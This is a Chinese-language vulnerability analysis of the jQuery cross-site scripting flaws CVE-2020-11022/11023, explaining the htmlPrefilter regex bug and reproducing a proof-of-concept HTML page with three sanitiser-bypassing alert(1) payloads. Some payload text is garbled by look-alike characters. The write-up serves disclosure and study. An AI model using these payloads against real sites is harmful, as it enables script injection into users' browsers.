漏洞详情
jQuery是美国John Resig程序员的一套开源、跨浏览器的JavaScript库。 jQuery 大于或等于1.2至3.5.0的版本中存在跨站脚本漏洞,该漏洞源于WEB应用缺少对客户端数据的正确验证。即使执行sanitize处理,也仍会执行将来自不受信任来源的HTML传递给jQuery的DOM操作方法(即html()、.append()等),攻击者可利用该漏洞执行客户端代码。
漏洞影响
V 1.2.0 <= jquery < V 3.5.0
漏洞分析
在html()方法中,HTML字符串将作为参数传递到 $ .htmlPrefilter()方法进行处理。 $ .htmlPrefilter()方法用于替换自闭合标签,有点类似标签自动补全。比如将<span/> 替换为 <span></span>。
3.x版本之前使用的正则为:
rxhtmlTag =/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([\w:-]+)[^>]*)\/>/gi [...] htmlPrefilter: function( html ) { return html.replace(rxhtmlTag, "<$1></$2>" ); }
3.x之后使用的正则为:
rxhtmlTag =/<(?!area|br|col|embed|hr|img|input|link|meta|param)(([a-z][^\/\0>\x20\t\r\n\f]*)[^>]*)\/>/gi
因为这个特性可以构造适合jQuery3.x的payload如下:
<img alt="<x" title="/><img src=xοnerrοr=alert(1)>
因为这里的xss payload是作为属性出现,所以可以绕过sanitize规则。该payload使用html()方法执行后会变为:
<img alt="<x" title="/></x”><imgsrc=x οnerrοr=alert(1)>
该正则会将 x" 识别为标签,并新增 /x" 来闭合标签,从而执行XSS的payload。
漏洞利用
访问本地搭建好html测试页面
点击 Append via .html() 即可触发弹窗:
html页面POC代码如下:
<!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</title> <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.4.1/jquery.js"></script> </head> <body> <script> function test(n,jq){ sanitizedHTML = document.getElementById('poc'+n).innerHTML; if(jq){ $('#div').html(sanitizedHTML); }else{ div.innerHTML=sanitizedHTML; } } </script> <h1>jQuery XSS Examples (CVE-2020-11022/CVE-2020-11023)</h1> <p>PoCs of XSS bugs fixed in <a href="//blog.jquery.com/2020/04/10/jquery-3-5-0-released/">jQuery 3.5.0</a>. You can find the details in my blog post: <a href="//mksben.l0.cm/2020/05/jquery3.5.0-xss.html">English</a> / <a href="//masatokinugawa.l0.cm/2020/05/jquery3.5.0-xss.html">日本語</a></p> <h2>PoC 1</h2> <button οnclick="test(1)">Assign to innerHTML</button> <button οnclick="test(1,true)">Append via .html()</button> <xmp id="poc1"> <style><style /><img src=x οnerrοr=alert(1)> </xmp> <h2>PoC 2 (Only jQuery 3.x affected)</h2> <button οnclick="test(2)">Assign to innerHTML</button> <button οnclick="test(2,true)">Append via .html()</button> <xmp id="poc2"> <img alt="<x" title="/><img src=x οnerrοr=alert(1)>"> </xmp> <h2>PoC 3</h2> <button οnclick="test(3)">Assign to innerHTML</button> <button οnclick="test(3,true)">Append via .html()</button> <xmp id="poc3"> <option><style></option></select><img src=x οnerrοr=alert(1)></style> </xmp> <div id="div"></div> </body> </html>
参考: